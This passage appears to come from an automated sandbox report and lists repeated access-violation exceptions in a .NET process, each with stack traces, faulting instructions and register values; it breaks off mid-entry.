_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x729d4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x4857373 registers.esp: 1893152 registers.edi: 1893492 registers.eax: 0 registers.ebp: 1893160 registers.edx: 0 registers.ebx: 1896372 registers.esi: 36488564 registers.ecx: 38616204	1
__exception__ Sept. 6, 2023, 2:04 p.m.	stacktrace: 0x48587d2 0x48585e1 0x4852b05 0x485177d 0xb1eeb9 0xb1d9ff 0xb17855 0xb16f0b 0xb13c6b 0xb135d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72142652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7215264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72152e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x722074ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72207610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72291dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72291e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72291f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7229416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x727ef5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x729d7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x729d4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 39 09 ff 15 50 86 2d 04 89 85 04 ff ff ff 8b 85 exception.instruction: cmp dword ptr [ecx], ecx exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x48539fa registers.esp: 1892864 registers.edi: 1893164 registers.eax: 0 registers.ebp: 1893176 registers.edx: 70091828 registers.ebx: 1896372 registers.esi: 36488564 registers.ecx: 0	1
__exception__ Sept. 6, 2023, 2:04 p.m.	stacktrace: 0x4857330 0x4858c3a 0x48585e1 0x4852b05 0x485177d 0xb1eeb9 0xb1d9ff 0xb17855 0xb16f0b 0xb13c6b 0xb135d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72142652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7215264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72152e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x722074ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72207610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72291dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72291e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72291f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7229416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x727ef5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x729d7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x729d4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x4857373 registers.esp: 1893152 registers.edi: 1893492 registers.eax: 0 registers.ebp: 1893160 registers.edx: 0 registers.ebx: 1896372 registers.esi: 36488564 registers.ecx: 40106712	1
__exception__ Sept. 6, 2023, 2:04 p.m.	stacktrace: 0x48590ac 0x4858ec9 0x4852aed 0x4851883 0xb1eeb9 0xb1d9ff 0xb17855 0xb16f0b 0xb13c6b 0xb135d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72142652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7215264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72152e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x722074ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72207610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72291dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72291e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72291f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7229416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x727ef5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x729d7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x729d4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 39 09 ff 15 50 86 2d 04 89 85 04 ff ff ff 8b 85 exception.instruction: cmp dword ptr [ecx], ecx exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x48539fa registers.esp: 1892896 registers.edi: 1893196 registers.eax: 0 registers.ebp: 1893208 registers.edx: 70091828 registers.ebx: 1896372 registers.esi: 36488564 registers.ecx: 0	1
__exception__ Sept. 6, 2023, 2:04 p.m.	stacktrace: 0x4857330 0x485946c 0x4858ec9 0x4852aed 0x4851883 0xb1eeb9 0xb1d9ff 0xb17855 0xb16f0b 0xb13c6b 0xb135d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72142652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7215264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72152e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x722074ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72207610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72291dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72291e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72291f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7229416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x727ef5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x729d7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x729d4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x4857373 registers.esp: 1893184 registers.edi: 1893492 registers.eax: 0 registers.ebp: 1893192 registers.edx: 0 registers.ebx: 1896372 registers.esi: 36488564 registers.ecx: 37538848	1
__exception__ Sept. 6, 2023, 2:04 p.m.	stacktrace: 0x48590ac 0x4858ec9 0x4852b05 0x4851883 0xb1eeb9 0xb1d9ff 0xb17855 0xb16f0b 0xb13c6b 0xb135d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72142652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7215264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72152e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x722074ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72207610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72291dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72291e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72291f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7229416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x727ef5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x729d7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x729d4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 39 09 ff 15 50 86 2d 04 89 85 04 ff ff ff 8b 85 exception.instruction: cmp dword ptr [ecx], ecx exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x48539fa registers.esp: 1892896 registers.edi: 1893196 registers.eax: 0 registers.ebp: 1893208 registers.edx: 70091828 registers.ebx: 1896372 registers.esi: 36488564 registers.ecx: 0	1
__exception__ Sept. 6, 2023, 2:04 p.m.	stacktrace: 0x4857330 0x485946c 0x4858ec9 0x4852b05 0x4851883 0xb1eeb9 0xb1d9ff 0xb17855 0xb16f0b 0xb13c6b 0xb135d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72142652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7215264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72152e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x722074ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72207610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72291dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72291e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72291f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7229416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x727ef5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x729d7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x729d4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x4857373 registers.esp: 1893184 registers.edi: 1893492 registers.eax: 0 registers.ebp: 1893192 registers.edx: 0 registers.ebx: 1896372 registers.esi: 36488564 registers.ecx: 39031940	1
__exception__ Sept. 6, 2023, 2:04 p.m.	stacktrace: 0x48590ac 0x4858ec9 0x4852b05 0x4851883 0xb1eeb9 0xb1d9ff 0xb17855 0xb16f0b 0xb13c6b 0xb135d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72142652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7215264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72152e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x722074ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72207610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72291dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72291e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72291f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7229416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x727ef5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x729d7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x729d4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 39 09 ff 15 50 86 2d 04 89 85 04 ff ff ff 8b 85 exception.instruction: cmp dword ptr [ecx], ecx exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x48539fa registers.esp: 1892896 registers.edi: 1893196 registers.eax: 0 registers.ebp: 1893208 registers.edx: 70091828 registers.ebx: 1896372 registers.esi: 36488564 registers.ecx: 0	1
__exception__ Sept. 6, 2023, 2:04 p.m.	stacktrace: 0x4857330 0x485946c 0x4858ec9 0x4852b05 0x4851883 0xb1eeb9 0xb1d9ff 0xb17855 0xb16f0b 0xb13c6b 0xb135d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72142652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7215264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72152e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x722074ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72207610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72291dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72291e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72291f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7229416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x727ef5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x729d7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x729d4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x4857373 registers.esp: 1893184 registers.edi: 1893492 registers.eax: 0 registers.ebp: 1893192 registers.edx: 0 registers.ebx: 1896372 registers.esi: 36488564 registers.ecx: 40524744	1
__exception__ Sept. 6, 2023, 2:04 p.m.	stacktrace: 0x4857330 0x485a7f3 0x4859d9e 0xb1ef11 0xb1d9ff 0xb17855 0xb16f0b 0xb13c6b 0xb135d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72142652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7215264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72152e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x722074ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72207610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72291dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72291e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72291f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7229416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x727ef5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x729d7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x729d4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x4857373 registers.esp: 1894276 registers.edi: 1894540 registers.eax: 0 registers.ebp: 1894284 registers.edx: 0 registers.ebx: 1896372 registers.esi: 41066428 registers.ecx: 41073404	1
__exception__ Sept. 6, 2023, 2:04 p.m.	stacktrace: 0x957e20 0x957d55 0x95347b 0x953126 0x951b93 0x951b5c DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72142652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7215264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72152e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x722074ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72207610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72291dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72291e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72291f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7229416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x727ef5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x729d7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x729d4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 8b 01 8b 40 28 ff 10 8b d0 85 c0 75 06 8b 15 2c exception.instruction: mov eax, dword ptr [ecx] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x957eb9 registers.esp: 3272604 registers.edi: 42053052 registers.eax: 0 registers.ebp: 3272628 registers.edx: 7159176 registers.ebx: 42053072 registers.esi: 42053872 registers.ecx: 0	1
__exception__ Sept. 6, 2023, 2:04 p.m.	stacktrace: 0x95b211 0x95b18b 0x95a3aa 0x959cbc 0x957f40 0x9534a0 0x953126 0x951b93 0x951b5c DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72142652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7215264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72152e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x722074ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72207610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72291dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72291e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72291f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7229416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x727ef5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x729d7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x729d4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 8b 52 04 3b 55 dc 0f 8f 39 fe ff ff eb 0c e8 a6 exception.instruction: mov edx, dword ptr [edx + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x95b48c registers.esp: 3272016 registers.edi: 43222872 registers.eax: 45126268 registers.ebp: 3272076 registers.edx: 0 registers.ebx: 43227144 registers.esi: 45126268 registers.ecx: 0	1
__exception__ Sept. 6, 2023, 2:04 p.m.	stacktrace: 0x95b211 0x95b1a8 0x95a3aa 0x959cbc 0x957f40 0x9534a0 0x953126 0x951b93 0x951b5c DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72142652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7215264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72152e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x722074ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72207610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72291dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72291e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72291f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7229416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x727ef5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x729d7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x729d4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 8b 52 04 3b 55 dc 0f 8f 39 fe ff ff eb 0c e8 a6 exception.instruction: mov edx, dword ptr [edx + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x95b48c registers.esp: 3272016 registers.edi: 43222872 registers.eax: 47319944 registers.ebp: 3272076 registers.edx: 0 registers.ebx: 45336244 registers.esi: 47319944 registers.ecx: 0	1
__exception__ Sept. 6, 2023, 2:04 p.m.	stacktrace: 0x95b211 0x95b1a8 0x95a3aa 0x959cbc 0x957f40 0x9534a0 0x953126 0x951b93 0x951b5c DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72142652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7215264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72152e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x722074ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72207610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72291dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72291e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72291f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7229416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x727ef5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x729d7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x729d4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 8b 52 04 3b 55 dc 0f 8f 39 fe ff ff eb 0c e8 a6 exception.instruction: mov edx, dword ptr [edx + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x95b48c registers.esp: 3272016 registers.edi: 43222872 registers.eax: 44293740 registers.ebp: 3272076 registers.edx: 0 registers.ebx: 43196852 registers.esi: 44293740 registers.ecx: 0	1
__exception__ Sept. 6, 2023, 2:04 p.m.	stacktrace: 0x95d839 0x95a7d9 0x959cbc 0x957f40 0x9534a0 0x953126 0x951b93 0x951b5c DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72142652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7215264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72152e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x722074ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72207610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72291dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72291e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72291f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7229416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x727ef5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x729d7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x729d4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 8b 52 04 3b 55 dc 0f 8f 7f fe ff ff eb 0c e8 af exception.instruction: mov edx, dword ptr [edx + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x95da83 registers.esp: 3272032 registers.edi: 42185672 registers.eax: 45852872 registers.ebp: 3272084 registers.edx: 0 registers.ebx: 44632816 registers.esi: 45852872 registers.ecx: 0	1
__exception__ Sept. 6, 2023, 2:04 p.m.	stacktrace: 0x95d839 0x95a7d9 0x959cbc 0x957f40 0x9534a0 0x953126 0x951b93 0x951b5c DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72142652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7215264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72152e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x722074ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72207610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72291dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72291e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72291f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd 